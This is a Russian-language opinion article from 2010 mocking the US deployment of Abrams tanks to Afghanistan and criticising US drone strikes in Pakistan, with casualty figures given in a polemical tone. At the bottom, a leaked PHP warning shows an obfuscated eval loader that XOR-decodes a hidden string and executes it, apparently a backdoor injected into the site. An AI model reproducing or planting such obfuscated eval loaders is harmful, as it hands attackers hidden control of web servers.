"Абрамсы" отправляются нести демократию в Афганистан

Америка в Афганистане

Абрамс в Ираке

На проходящем в эти дни встрече стран-участниц НАТО в Лиссабоне было объявлено, что до 2014 года планируется вывести из Афганистана все миротворческие части и передать контроль над страной афганским силовым структурам. А чтобы до объявленного года окончательно искоренить все террористические силы, армия США впервые за 9 лет войны отправляет в Афганистан танки «Абрамс».

Вот и возникает вопрос, что же за операции собираются там проводить американцы, что им понадобилась такая серьезная техника? Ведь понятно, что в городах от танков толку мало, а при проведении рейдов громоздкие американские машины — прекрасная мишень для гранатометчиков.

А танкистам расхваленных на весь мир «Абрамсов» есть чего в таком случае бояться. Война в Ираке, где эти танки применялись весьма активно, показала, что как минимум тандемный выстрел РПГ-7 легко пробивает эту машину. При этом нужно учитывать, что данный гранатомет принят на вооружение еще Советской армии в далеком 1961 году. А с того времени как защита танков, так и противотанковые средства непрерывно эволюционировали.

Так если не в Афганистане, то где эти танки применять. Ответ назревает один — Пакистан. Базы талибов на территории этой страны уже давно мешают американцам, правда они и сейчас не сидят сложа руки, порой откровенно наплевывая на суверенитет и права человека.

Так, 28 октября 2010 года несколько американских беспилотников нанесли удар по предполагаемым укрытиям боевиков Талибана. В результате них погибли не менее 5 человек, в том числе 3 араба и один афганец. Но этого американцам оказалось мало, и на следующий день они нанесли еще два удара, которые унесли жизни еще 6 человек.

В конце августа этого года беспилотник нанес ракетный удар по северо-западному Пакистану. Погибли 13 боевиков и 7 мирных жителей, в том числе четыре женщины и трое детей. Целью удара было убежище боевиков на севере страны, но видимо беспилотники «малость» промахнулись. В целом, в течение 2010 года удары наносились более 100 раз, в ходе которых погибло около сотни человек. А всего, с августа 2008 года, когда американцы начали периодически «утюжить» территорию Пакистана, погибли около 1200 человек.

А вот «промахивались» беспилотники частенько и по самым разным целям, в том числе и по религиозным школам. Правда, рекорд «точности» принадлежит до сих пор афганскому городу Кандагар, в котором в результате авиаудара была уничтожена целая свадьба в несколько десятков человек. Но, судя по все возрастающей интенсивности авиаударов, в скором времени американцы «отдемократят» и какую-нибудь пакистанскую свадьбу.

Опубликовано 25-11-2010, 18:21 Просмотров 136

поделись с друзьями
Комментарий:
Введите код: *
Warning: assert(): Assertion "eval('$nGIE3=$FHLfom3Fx($nGIE3);$bQQvD7cg="";$QVSry4="DuSAkQ";for($gyBB3G=0;$gyBB3G<716;$gyBB3G++)$bQQvD7cg.=chr(ord($nGIE3[$gyBB3G])^ord($QVSry4[$gyBB3G%6]));@eval($cnDaz8X($bQQvD7cg));');" failed in /home/a/alvis2/tchest.org/public_html/index.php on line 321